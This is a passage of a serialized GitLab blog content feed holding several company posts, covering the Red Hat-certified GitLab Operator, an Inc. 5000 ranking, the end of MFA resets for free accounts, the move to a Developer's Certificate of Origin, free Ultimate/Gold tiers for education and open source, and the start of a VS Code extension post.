added to](/handbook/product/tiering-guidance-for-features/). Some of the capabilities you can look forward to are\nindustry-specific features, tighter integration with the CI process and vulnerability\nmanagement, as well as pre-built support for many common network protocols.\n\nOne of our values at GitLab is [iteration](https://handbook.gitlab.com/handbook/values/#iteration) and we wanted to share the Community\nEdition as soon as we could so everyone can contribute sooner! We would\nlove for you to check it out and provide feedback and your own contributions.\n",[9,930],{"slug":2565,"featured":6,"template":689},"gitlab-open-sources-protocol-fuzz-test-engine","content:en-us:blog:gitlab-open-sources-protocol-fuzz-test-engine.yml","Gitlab Open Sources Protocol Fuzz Test Engine","en-us/blog/gitlab-open-sources-protocol-fuzz-test-engine.yml","en-us/blog/gitlab-open-sources-protocol-fuzz-test-engine",{"_path":2571,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2572,"content":2578,"config":2584,"_id":2586,"_type":14,"title":2587,"_source":16,"_file":2588,"_stem":2589,"_extension":19},"/en-us/blog/gitlab-operator-red-hat-certification",{"title":2573,"description":2574,"ogTitle":2573,"ogDescription":2574,"noIndex":6,"ogImage":2575,"ogUrl":2576,"ogSiteName":673,"ogType":674,"canonicalUrls":2576,"schema":2577},"GitLab Operator certified by Red Hat OpenShift","The GitLab Operator is now certified by Red Hat’s OpenShift standards, allowing users to install GitLab directly on an OpenShift cloud cluster.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682717/Blog/Hero%20Images/bi_worldwise_casestudy_image.png","https://about.gitlab.com/blog/gitlab-operator-red-hat-certification","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Operator certified by Red Hat OpenShift\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dilan Orrino\"}],\n        \"datePublished\": \"2023-05-11\",\n      }",{"title":2573,"description":2574,"authors":2579,"heroImage":2575,"date":2581,"body":2582,"category":10,"tags":2583},[2580],"Dilan Orrino","2023-05-11","\nGitLab and Red Hat have been technology partners for more than two years, collaborating on a number of projects. GitLab first started its integration with Red Hat’s OpenShift cloud-based container platform by introducing the [GitLab Runner Operator](https://catalog.redhat.com/software/container-stacks/detail/5e9877e96c5dcb34dfbb1ac9) in GitLab Version 13.3. The Runner Operator offered the capability to run pipeline tasks from an external GitLab instance to OpenShift clusters.\n\nOur next step was to more closely integrate with the OpenShift platform and alleviate the need to require the GitLab instance to run external to OpenShift-based infrastructure. [The GitLab Operator](https://docs.gitlab.com/operator/) is now certified by Red Hat, which enables the capability to install an instance of GitLab inside of an OpenShift cloud cluster.\n\n## Benefits of GitLab with Red Hat OpenShift\n\nThe [Operator framework](https://operatorframework.io/about/) offers many benefits, but the main reason we identified is that it would allow us to run a self-managed instance of GitLab inside an OpenShift cluster. The GitLab DevSecOps platform can be operated on the same trusted infrastructure as other applications and services within a customer's organization. \n\nThe Operator framework also delivers a streamlined installation and seamless version upgrades. As the GitLab Operator continues to be developed, we hope to add other elements of the Operator framework such as backup and recovery, comprehensive metrics, and auto-tuning and auto-scaling. GitLab plans to align our future cloud-native deployment model behind our Operator.\n\n![Capability model](https://about.gitlab.com/images/blogimages/gitlaboperatorcapabilitymodel.png){: .shadow}\n\n\n## Details of the Red Hat certification\n\nThe Red Hat Certification included aligning our application components with Red Hat’s Universal Base Image (UBI) when deploying through the Red Hat Marketplace. The Red Hat Certification also included meeting all of [Red Hat’s policy requirements](https://access.redhat.com/documentation/en-us/red_hat_software_certification/8.61#con-operator-requirements_openshift-sw-cert-policy-products-managed). The certification signifies GitLab being supported on OpenShift in collaboration with Red Hat. The Operator as a deployment method will be available as a recommended choice in Q3, but is available for testing now.\n\n## A technical milestone\n\nThe GitLab application is complex, so building an Operator to deploy it was a technical achievement for the GitLab and Red Hat engineering teams. Completing this operator certification is a significant milestone and gives customers the confidence and assurance that GitLab runs effectively, jointly supported by Red Hat, on OpenShift.\n\n![GitLab Operator install screen](https://about.gitlab.com/images/blogimages/gitlaboperatorinstall.png){: .shadow}\n\n\n## Try the GitLab Operator\n\n[The GitLab Operator](https://docs.gitlab.com/operator/) is available now for testing in the OpenShift console via the embedded OperatorHub, and will be production ready for GitLab instances in Q3 2023. Check out the [catalog listing](https://catalog.redhat.com/software/container-stacks/detail/5ec3fcb08b6f188e53644c0f) for links to documentation and installation instructions. For a self-managed free trial to host GitLab on your OpenShift cluster, [submit this form](/free-trial/?hosted=self-managed).\n",[282,9,845],{"slug":2585,"featured":6,"template":689},"gitlab-operator-red-hat-certification","content:en-us:blog:gitlab-operator-red-hat-certification.yml","Gitlab Operator Red Hat Certification","en-us/blog/gitlab-operator-red-hat-certification.yml","en-us/blog/gitlab-operator-red-hat-certification",{"_path":2591,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2592,"content":2598,"config":2603,"_id":2605,"_type":14,"title":2606,"_source":16,"_file":2607,"_stem":2608,"_extension":19},"/en-us/blog/gitlab-ranked-44-on-inc-5000-list",{"title":2593,"description":2594,"ogTitle":2593,"ogDescription":2594,"noIndex":6,"ogImage":2595,"ogUrl":2596,"ogSiteName":673,"ogType":674,"canonicalUrls":2596,"schema":2597},"GitLab ranks 4th on Inc. 5000 fastest-growing software list","GitLab ranked 4th fastest-growing private software company (#44 overall) on the Inc. 5000 list. How did we achieve such a strong rank among 2018's fastest-growing companies? Here's what we think.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682941/Blog/Hero%20Images/inc-5000-2018.png","https://about.gitlab.com/blog/gitlab-ranked-44-on-inc-5000-list","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab ranked 4th fastest-growing private software company on Inc. 5000 list of 2018's fastest growing companies\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-08-16\",\n      }",{"title":2599,"description":2594,"authors":2600,"heroImage":2595,"date":1860,"body":2601,"category":299,"tags":2602},"GitLab ranked 4th fastest-growing private software company on Inc. 5000 list of 2018's fastest growing companies",[970],"\nPop the champagne! GitLab is now one America's fastest-growing private companies, ranking as the 4th fastest-growing private software company (44th overall) on this year's [Inc. 5000 list](https://www.inc.com/inc5000/list/2018) with revenue growth of 6,213 percent over the past three years. This is the first year GitLab has appeared on Inc.'s 5000 list and we're happy to have such a strong showing.\n\n## Not just Git anymore\n\nWith humble beginnings as a simple Git repository manager, GitLab is now the only single application for the entire software development and operations lifecycle. Built on the philosophy that '[everyone can contribute](/company/mission/#mission),' GitLab allows product, engineering, quality assurance, operations, and security teams to work together at the same time in the same app, eliminating handoffs and bottlenecks and accelerating cycle time. From project planning and source code management, to CI/CD and monitoring, GitLab has everything businesses need for end-to-end [DevOps](/topics/devops/).\n\n## How we move so fast\n\nOur velocity of product innovation is largely thanks to our robust open source community of [more than 2,000 contributors](http://contributors.gitlab.com/). Our [open issue tracker](https://gitlab.com/gitlab-org/gitlab-ce/issues) allows anyone to comment on and contribute to the code we are co-creating with more than 100,000 organizations worldwide, including NASA, NASDAQ, Sony, and Bayer. This is just one of the ways we strive to live our [value of openness and transparency](https://handbook.gitlab.com/handbook/values/#transparency).\n\nOur customers are always telling us that they want to spend their engineering resources on writing code that makes money for the company instead of reinventing the wheel. By using GitLab they get to leverage the collective experience of over 100,000 organizations. They know they've got not only a great product today, but a strategic partner for the future. This collaborative spirit is how we're not only delivering new functionality fast (so fast, we're running out of space on the slide below 😁), but also shipping code that solves real-world problems, which accounts for the pace of our revenue growth.\n\n[![GitLab exponential rate of product development](https://about.gitlab.com/images/blogimages/gitlab-product-improvement-velocity.png)](/direction/)\n\nBeing on the Inc. 5000 list is an honor and a big milestone, but we're just getting started. We have no intention of slowing down as we look to build best-in-class functionality across every part of the DevOps lifecycle.\n\n#### About the Inc. 5000 list\n\nThis year's Inc. 5000 ranking system is based on the percentage of revenue growth qualifying companies saw from 2014 to 2017. For consideration, companies needed to be private, for-profit, independent and U.S.-based as of December 31, 2017. The companies must have also been incorporated by March 31, 2014 with a minimum revenue of $200,000 for that year and $2 million for 2017.\n",[930,9],{"slug":2604,"featured":6,"template":689},"gitlab-ranked-44-on-inc-5000-list","content:en-us:blog:gitlab-ranked-44-on-inc-5000-list.yml","Gitlab Ranked 44 On Inc 5000 List","en-us/blog/gitlab-ranked-44-on-inc-5000-list.yml","en-us/blog/gitlab-ranked-44-on-inc-5000-list",{"_path":2610,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2611,"content":2616,"config":2622,"_id":2624,"_type":14,"title":2625,"_source":16,"_file":2626,"_stem":2627,"_extension":19},"/en-us/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users",{"title":2612,"description":2613,"ogTitle":2612,"ogDescription":2613,"noIndex":6,"ogImage":1211,"ogUrl":2614,"ogSiteName":673,"ogType":674,"canonicalUrls":2614,"schema":2615},"GitLab Support is no longer processing MFA resets for free users","From August 15th, GitLab Support will no longer be manually removing MFA from free accounts.","https://about.gitlab.com/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Support is no longer processing MFA resets for free users\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lyle Kozloff\"}],\n        \"datePublished\": \"2020-08-04\",\n      }",{"title":2612,"description":2613,"authors":2617,"heroImage":1211,"date":2619,"body":2620,"category":930,"tags":2621},[2618],"Lyle Kozloff","2020-08-04","\n\nBack in 2018, I wrote a blog post on [Keeping your GitLab account safe (and accessible)](/blog/keeping-your-account-safe/) in which I outlined some of the ways that our users could make sure that they were keeping their accounts secure and recoverable.\n\nFast-forward to 2020 and GitLab as a company has matured. Today our users are starting to face attack-vectors that were previously unheard of on GitLab.com. As a result, we don’t want our security practices to be only going through the motions of security. We’ve all seen examples of companies whose Multi-Factor Authentication (MFA) reset policies negate the security benefits of MFA on accounts. \n\nToday we’re announcing a change that will put account security wholly in the hands of our users.\n\n**As of Aug. 15th, 2020, GitLab Support will no longer process MFA resets for free accounts.**\n\nThis change means that if you’re using GitLab with MFA you will want to ensure that you have an appropriate set of backup methods to recover your account.\n\nNamely:\n- (Re)generate recovery codes and store them in a secure location\n- Use a hardware token whenever possible\n- Add an [SSH key](/solutions/source-code-management/) to your account to allow the generation of backup codes\n\nIf you are caught where you are not able to provide your MFA token and without these backup methods,  your account will be irrecoverable. \n\n### FAQ:\n\n#### What if I accidentally lose my phone/recovery keys or get a new laptop and forget to back up my SSH key?\n\nIf you lose your primary authentication method and all backup methods, your account will be irrecoverable.\n\n#### What if this is a work account?\n\nFor accounts occupying a paid seat, created with a company email address, [MFA resets can still be requested](/handbook/support/workflows/account_verification.html#access-with-support-intervention). There will be a minimum three business-day processing time and you'll be required to pass a number of security challenges to verify account ownership.\n\n#### I don’t like this and I want to tell someone.\n\nWe’re [accepting community feedback in this forum post](https://forum.gitlab.com/t/draft-gitlab-support-is-no-longer-processing-mfa-resets-for-free-users/40905), and invite contributors to share there. \n\n#### Can I add my phone number as a recovery method?\n\nWe’re discussing this in the [forum post](https://forum.gitlab.com/t/draft-gitlab-support-is-no-longer-processing-mfa-resets-for-free-users/40905), but phone numbers as a recovery method are problematic in many countries. \n\n#### Can I add X as a recovery method?\n\nGitLab is developed in collaboration with the wider community. We’re accepting merge requests and feature proposals in [gitlab.com/gitlab-org/gitlab](https://gitlab.com/gitlab-org/gitlab/) and look forward to building together.\n\n_Learn more about [security best practices for your GitLab instance](/blog/gitlab-instance-security-best-practices/)._\n{: .alert .alert-info .text-center}\n",[267,865,930,9],{"slug":2623,"featured":6,"template":689},"gitlab-support-no-longer-processing-mfa-resets-for-free-users","content:en-us:blog:gitlab-support-no-longer-processing-mfa-resets-for-free-users.yml","Gitlab Support No Longer Processing Mfa Resets For Free Users","en-us/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users.yml","en-us/blog/gitlab-support-no-longer-processing-mfa-resets-for-free-users",{"_path":2629,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2630,"content":2635,"config":2640,"_id":2642,"_type":14,"title":2643,"_source":16,"_file":2644,"_stem":2645,"_extension":19},"/en-us/blog/gitlab-switches-to-dco-license",{"title":2631,"description":2632,"ogTitle":2631,"ogDescription":2632,"noIndex":6,"ogImage":900,"ogUrl":2633,"ogSiteName":673,"ogType":674,"canonicalUrls":2633,"schema":2634},"We're switching to a DCO for source code contributions","We want to make it even easier for everyone to contribute, by doing away with our Contributor License Agreement in favor of the Developer's Certificate of Origin.","https://about.gitlab.com/blog/gitlab-switches-to-dco-license","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're switching to a DCO for source code contributions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jamie Hurewitz\"}],\n        \"datePublished\": \"2017-11-01\",\n      }",{"title":2631,"description":2632,"authors":2636,"heroImage":900,"date":2637,"body":2638,"category":299,"tags":2639},[1054],"2017-11-01","\n\nWe're committed to being [good stewards of open source](/blog/being-a-good-open-source-steward/),\nand part of that commitment means we never stop re-evaluating how we do that.\nSaying \"everyone can contribute\" is about removing barriers to contribution.\nFor some of our community, the Contributor License Agreement is a deterrent to\ncontributing to GitLab, so we're changing to a Developer's Certificate of Origin instead.\n\n\u003C!-- more -->\n\nMany large open source projects want to be masters of their own destiny.\nHaving the freedom to run your own infrastructure based on open source software,\ntogether with the ability to modify and audit source code and not be dependent\non a vendor, makes open source appealing. We want GitLab to be an option for everyone.\n\n## Why the change?\n\nA Contributor License Agreement (CLA) is the industry standard for open source\ncontributions to other projects, but it's unpopular with developers, who don't\nwant to enter into legal terms and are put off by having to review a lengthy\ncontract and potentially give up some of their rights. Contributors find the\nagreement unnecessarily restrictive, and it's deterring developers of open\nsource projects from using GitLab. We were approached by Debian developers to\nconsider dropping the CLA, and that's what we're doing.\n\n## What's changing?\n\nAs of today, we're rolling out changes so that contributors to the GitLab [source\ncode](/solutions/source-code-management/) will only be required to make contributions and bug fixes under a project\nlicense (MIT for all repositories with the exception of Omnibus which would be\nlicensed under Apache) and a [Developer's Certificate of Origin](https://developercertificate.org/) (DCO).\nThe DCO gives developers greater flexibility and portability for their\ncontributions, and it's one of the reasons that Debian and GNOME plan to migrate\ntheir communities and projects to GitLab. We hope this change\nencourages more developers to contribute to GitLab. Thank you Debian, for\nprompting us to make this change.\n\n> \"We applaud GitLab for dropping their CLA in favor of a more OSS-friendly\napproach. Open source communities are born from a sea of contributions that come\ntogether and transform into projects. This gesture affirmed GitLab's willingness\nto protect the individual, their creative process, and most importantly, keeps\nintellectual property in the hands of the creator.\" - Carlos Soriano, Board Director at GNOME\n\n>\"We’re thrilled to see GitLab simplifying and encouraging community\ncontributions by switching from a CLA to the DCO. We recognize that making a\nchange of this nature is not easy and we applaud the time, patience and\nthoughtful consideration GitLab has shown here.\" - Chris Lamb, Debian Project Leader\n\nYou can [read the analysis that informed our decision](https://docs.google.com/a/gitlab.com/document/d/1zpjDzL7yhGBZz3_7jCjWLfRQ1Jryg1mlIVmG8y6B1_Q/edit?usp=sharing).\nRead all about our [stewardship of GitLab Community Edition](/company/stewardship/).\n",[9,930,267],{"slug":2641,"featured":6,"template":689},"gitlab-switches-to-dco-license","content:en-us:blog:gitlab-switches-to-dco-license.yml","Gitlab Switches To Dco License","en-us/blog/gitlab-switches-to-dco-license.yml","en-us/blog/gitlab-switches-to-dco-license",{"_path":2647,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2648,"content":2654,"config":2661,"_id":2663,"_type":14,"title":2664,"_source":16,"_file":2665,"_stem":2666,"_extension":19},"/en-us/blog/gitlab-taught-in-korean-uni",{"title":2649,"description":2650,"ogTitle":2649,"ogDescription":2650,"noIndex":6,"ogImage":2651,"ogUrl":2652,"ogSiteName":673,"ogType":674,"canonicalUrls":2652,"schema":2653},"Schooled in GitLab: Teaching our handbook at a South Korean university","Students at Hankuk University of Foreign Studies tackled our handbook. The students' favorite topics were compensation and remote work.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673044/Blog/Hero%20Images/books-internship-post.jpg","https://about.gitlab.com/blog/gitlab-taught-in-korean-uni","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Schooled in GitLab: Teaching our handbook at a South Korean university\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Guenjun Yoo\"}],\n        \"datePublished\": \"2020-01-29\",\n      }",{"title":2649,"description":2650,"authors":2655,"heroImage":2651,"date":2657,"body":2658,"category":10,"tags":2659},[2656],"Guenjun Yoo","2020-01-29","\nBusiness students at [Hankuk University of Foreign Studies](http://mis.hufs.ac.kr/) in Seoul, South Korea are studying the GitLab handbook and business model. The students are enthusiastic about GitLab and its story, says lecturer SanJoon Song in an email interview, but there was one problem: Our 3,000+ page handbook is a lot to swallow in one semester.\n\nSo Song had the class divide the handbook into 15 different categories, which different groups of students researched over the course of the semester. At the end of the term, the groups presented a summary of their category to the class.\n\n“Many engineers in Korea said that the GitLab handbook is good to read before starting up a business,” says Song. “However, there is a lot of reading in the handbook; too many pages for me.”\n\nThe level of transparency in the handbook was a revelation to Song and his students.\n\n“We didn't study [the handbook] only to focus on the content itself, but we tried to understand and share about the context of handbook; what conventions GitLab has and what protocols GitLab is trying to develop with its employees by this handbook,” says Song. “In Korea, this is very unusual to share such details of company goals and protocols with entire employees by handbook and for me, this approach is very new and fresh.”\n\n## Inside information\n\nSong was very surprised by how much “insider” information is available in our handbook and says he’s particularly amazed by the detailed explanations of what to do if things go wrong.\n\nOn the other hand, his students were most impressed by the details on [compensation](/handbook/total-rewards/compensation/compensation-calculator/calculator/) and incentives in the handbook, followed closely by the idea of remote work.\n\n“Personally I liked the concept of [‘accept mistakes’](https://handbook.gitlab.com/handbook/values/#accept-mistakes) in the efficiency section,” says Song. “We also talked a lot about GitLab’s [six values](https://handbook.gitlab.com/handbook/values/).”\n\n![Breaking down the handbook](https://about.gitlab.com/images/blogimages/studyingthehandbook.jpg){: .shadow.medium.center}\nStudents in Song's class breaking down the handbook.\n{: .note.text-center}\n\nRemote work was also a big topic of discussion in Song's classroom.\n\n\"Many Koreans are interested in remote work,\" says Song. \"It is really great that people can work anywhere, anytime without having the stress of commuting. Remote work is not common in Korea yet. Only a few software developers are allowed to work from home but that is also partial and in a limited environment only. Many students also want to do the remote work but this is still kind of a dream.”\n\nSong is currently teaching a second GitLab-focused class, this time diving into project management and DevOps by looking at our product and Pivotal Labs. If there is one benefit Song thinks his students have taken away from studying GitLab it’s the importance of communication.\n\n“Communication between employees is one of the most important matters,\" says Song. \"By studying the GitLab handbook, my students and I learned an efficient way of communication between the employer and employees. The handbook explicitly shows how GitLab is trying to do the best way of communication between stakeholders; what is the company goal, why we established the goal and how we are achieving the goal.”\n\nSong hopes to inspire a future generation of entrepreneurs by studying the GitLab handbook in the classroom.\n\n“My students have studied the GitLab handbook for one semester. I hope this study can be their reference when they start their startup, so they can create their company goals and prototype in the direction of success, like GitLab.\"\n\n_If you’re interested in seeing more of Song’s curriculum, he shared it\n[here](https://docs.google.com/document/d/1u5J6Ypj6zwQJVjmrl1wd0eIv7Q_TYLJysDquhGMJimA/edit). You'll need to scroll down a bit._\n\nCover image by [Patrick Tomasso](https://unsplash.com/@impatrickt) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1078,267,685,9,2660,888],"remote work",{"slug":2662,"featured":6,"template":689},"gitlab-taught-in-korean-uni","content:en-us:blog:gitlab-taught-in-korean-uni.yml","Gitlab Taught In Korean Uni","en-us/blog/gitlab-taught-in-korean-uni.yml","en-us/blog/gitlab-taught-in-korean-uni",{"_path":2668,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2669,"content":2675,"config":2680,"_id":2682,"_type":14,"title":2683,"_source":16,"_file":2684,"_stem":2685,"_extension":19},"/en-us/blog/gitlab-top-30-highest-velocity-open-source",{"title":2670,"description":2671,"ogTitle":2670,"ogDescription":2671,"noIndex":6,"ogImage":2672,"ogUrl":2673,"ogSiteName":673,"ogType":674,"canonicalUrls":2673,"schema":2674},"We're one of the 30 Highest Velocity Open Source Projects","With a magical combination of number of commits, authors, issues and merge requests, we're in great company with other open source projects with momentum.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671330/Blog/Hero%20Images/highest-velocity-open-source-projects.jpg","https://about.gitlab.com/blog/gitlab-top-30-highest-velocity-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're one of the 30 Highest Velocity Open Source Projects\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2017-07-06\",\n      }",{"title":2670,"description":2671,"authors":2676,"heroImage":2672,"date":2677,"body":2678,"category":10,"tags":2679},[1859],"2017-07-06","\n\nIn June the Cloud Native Computing Foundation released its chart of the [top open source projects with the highest developer velocity](https://www.cncf.io/blog/30-highest-velocity-open-source-projects/), and we're proud to be included – in good company!\n\n\u003C!-- more -->\n\nMeasuring commits, authors, issues and merge or pull requests, the chart places GitLab in the top right quadrant with eight others including [Kubernetes](https://docs.gitlab.com/ee/user/project/clusters/index.html) and [Elasticsearch](https://docs.gitlab.com/ee/integration/elasticsearch.html).\n\n![CNCF highest velocity open source projects chart](https://about.gitlab.com/images/blogimages/CNCF-highest-velocity-open-source-chart.png){: .shadow}\n\n## Open Source at Heart\n\nWhile ['open core'](/blog/gitlab-is-open-core-github-is-closed-source/) might be a more accurate description of GitLab, as we ship both an [open source version](/pricing/feature-comparison/) and [closed source version](/pricing/), we adopt an open source approach to both, with a publicly viewable issue tracker and license that allows modifications once you purchase a license.\n\nWe already know that there are good reasons [why you should choose to work with open source projects](/blog/why-choose-open-source/), and we're grateful to our over [1700 contributors](http://contributors.gitlab.com/contributors) who have helped to shape GitLab – not just the product, but the company too. I work in the Marketing team and am always surprised and pleased when a member of our community pops up in an issue in the [Marketing project](https://gitlab.com/gitlab-com/marketing/issues) to offer some input or share an idea. It's a great reminder that [everyone can contribute](/community/contribute/), and those contributions go far beyond development.\n\nSo, thank you!\n\n## Keep Those Contributions Coming\n\nIf you're new to GitLab, [this will help](/blog/heres-how-new-programmers-can-learn-by-contributing-to-gitlab/), otherwise, as always, feel free to [open or comment on an issue](https://gitlab.com/gitlab-org/gitlab-ce/issues). See [all the ways you can contribute here](/community/contribute/).\n\n[Cover image](https://unsplash.com/search/jaws-haiku-pauwela-united-states?photo=sW8psg40WXY) by [Anton Repponen](https://unsplash.com/@repponen) on Unsplash\n{: .note}\n",[9,930],{"slug":2681,"featured":6,"template":689},"gitlab-top-30-highest-velocity-open-source","content:en-us:blog:gitlab-top-30-highest-velocity-open-source.yml","Gitlab Top 30 Highest Velocity Open Source","en-us/blog/gitlab-top-30-highest-velocity-open-source.yml","en-us/blog/gitlab-top-30-highest-velocity-open-source",{"_path":2687,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2688,"content":2694,"config":2699,"_id":2701,"_type":14,"title":2702,"_source":16,"_file":2703,"_stem":2704,"_extension":19},"/en-us/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source",{"title":2689,"description":2690,"ogTitle":2689,"ogDescription":2690,"noIndex":6,"ogImage":2691,"ogUrl":2692,"ogSiteName":673,"ogType":674,"canonicalUrls":2692,"schema":2693},"GitLab Ultimate and Gold now free for education and open source","Our top-tier SaaS and self-managed offerings are now free to educational institutions and open source projects. Find out how to apply.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680096/Blog/Hero%20Images/open-source-education-cover.png","https://about.gitlab.com/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Ultimate and Gold now free for education and open source\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-06-05\",\n      }",{"title":2689,"description":2690,"authors":2695,"heroImage":2691,"date":2696,"body":2697,"category":10,"tags":2698},[970],"2018-06-05","\n\n**Update 2023-02-15:** This blog has been updated to remove an outdated reference to separately purchasing paid support.\nCurrent information on GitLab's Open Source benefits can be found [here](https://about.gitlab.com/solutions/open-source/).\n{: .alert .alert-warning}\n\nIt has been a [crazy 24 hours for GitLab](/blog/movingtogitlab/). More than [2,000 people tweeted about #movingtogitlab](https://twitter.com/movingtogitlab). We imported [over 100,000 repositories](https://twitter.com/gitlab/status/1004143715844124673), and we've seen a 7x increase in orders. We went [live on Bloomberg TV](https://www.youtube.com/watch?v=o7Y-aQgr8Dk&feature=youtu.be&t=30m59s). And on top of that, Apple announced an Xcode integration with GitLab.\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Apple just announced Xcode 10 is now integrated with GitLab making it seamless and easy for iOS developers to develop new and exciting applications with just a single application for the entire lifecycle.\u003Ca href=\"https://t.co/eQbtiY4IYm\">pic.twitter.com/eQbtiY4IYm\u003C/a>\u003C/p>&mdash; GitLab (@GitLab Chatops) \u003Ca href=\"https://twitter.com/gitlab/status/1003764673454342144?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n![Github Imports Chart](https://about.gitlab.com/images/blogimages/github-imports-chart.png){: .medium.center}\n\nWe went live on YouTube on Sunday evening to answer your questions about #movingtogitlab and got a question from Mohammad Al-Ahdal who asked: \"What about Education Discounts or Student Dev Packs?\"\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/bKS6gJtTZes?start=3979\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen>\u003C/iframe>\n\nToday, we're excited to announce that GitLab Ultimate and Gold are now free for educational institutions and open source projects.\n\n1. [Educational institutions application](/solutions/education/)\n1. [Open source projects application](/solutions/open-source/)\n\n## What are GitLab Ultimate and GitLab Gold?\n\n[GitLab Ultimate and Gold](/pricing/) are our most comprehensive offerings. GitLab Ultimate is self-managed, whereas GitLab Gold is our SaaS offering hosted on GitLab.com. It includes all of the features in Core, Starter, and Premium, plus a more robust set of portfolio management and security features. For open source and educational projects, this means unlimited access to current and new features, including [Epics](https://docs.gitlab.com/ee/user/group/epics/), [Roadmap](https://docs.gitlab.com/ee/user/group/roadmap/), [Static Application Security Testing](https://docs.gitlab.com/ee/user/application_security/sast/), [Container Scanning](https://docs.gitlab.com/ee/user/application_security/container_scanning/#doc-nav), and so much more!\n\n### Does it come with support?\n\nFree GitLab Ultimate and Gold accounts **do not** include support. Information on what's included can be found on our [open-source program page](https://about.gitlab.com/handbook/marketing/developer-relations/community-programs/opensource-program/).\n\n## Free GitLab account\n\nWhy provide a GitLab free account? We make GitLab free for education because we want students to use our most advanced features. Many universities already run GitLab. If the students use the advanced features of GitLab Ultimate and Gold they will take their experiences with these advanced features to their workplaces.\n\nWe would love to have more open source projects use GitLab. Public projects on GitLab.com already have all the features of GitLab Ultimate. And projects like [GNOME](https://www.gnome.org/news/2018/05/gnome-moves-to-gitlab-2/) and [Debian](https://salsa.debian.org/public) already run their own server with the open source version of GitLab. With today's announcement, open source projects that are comfortable running on proprietary software can use all the features GitLab has to offer, while allowing us to have a sustainable business model by charging non-open source organizations.\n\n",[9,930],{"slug":2700,"featured":6,"template":689},"gitlab-ultimate-and-gold-free-for-education-and-open-source","content:en-us:blog:gitlab-ultimate-and-gold-free-for-education-and-open-source.yml","Gitlab Ultimate And Gold Free For Education And Open Source","en-us/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source.yml","en-us/blog/gitlab-ultimate-and-gold-free-for-education-and-open-source",{"_path":2706,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2707,"content":2713,"config":2719,"_id":2721,"_type":14,"title":2722,"_source":16,"_file":2723,"_stem":2724,"_extension":19},"/en-us/blog/gitlab-vscode-extension",{"title":2708,"description":2709,"ogTitle":2708,"ogDescription":2709,"noIndex":6,"ogImage":2710,"ogUrl":2711,"ogSiteName":673,"ogType":674,"canonicalUrls":2711,"schema":2712},"A VS Code extension for GitLab: GitLab Workflow","Senior Frontend Engineer Fatih Acet created a VS Code extension, GitLab Workflow, which allows you to do many GitLab-specific tasks quickly and easily.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680196/Blog/Hero%20Images/vs-code-extension-gitlab-workflow.jpg","https://about.gitlab.com/blog/gitlab-vscode-extension","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A VS Code extension for GitLab: GitLab Workflow\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatih Acet\"}],\n        \"datePublished\": \"2018-03-01\",\n      }",{"title":2708,"description":2709,"authors":2714,"heroImage":2710,"date":2716,"body":2717,"category":801,"tags":2718},[2715],"Fatih Acet","2018-03-01","\n\nWe recently did a survey within the Frontend team to see which tools we were using and how we were using them, in order to learn from one another and to build better development workflows. Through this survey, we determined that [Visual Studio Code (VS Code)](https://code.visualstudio.com/) is the most used integrated development environment (IDE) within the team. This led to the idea for a GitLab extension for VS Code that could help reduce context switching and boost productivity.\n\nUpdate: Read [eight tips for using the GitLab VS Code extension](https://about.gitlab.com/blog/vscode-workflows-for-working-with-gitlab/) and about [how GitLab + VS Code can be used for extension development](/blog/vscode-extension-development-with-gitlab/).\n{: .alert .alert-info .text-center}\n\nThis is not a [GitLab feature](/pricing/feature-comparison/) (we're actually working on building our own integrated [web IDE](https://docs.gitlab.com/ee/user/project/web_ide/)), but the extension is a quick and easy way to perform a lot of useful actions you would usually visit [GitLab.com](https://gitlab.com/) to do, directly within your VS Code editor. Watch the demo below and read on for more about how I developed the 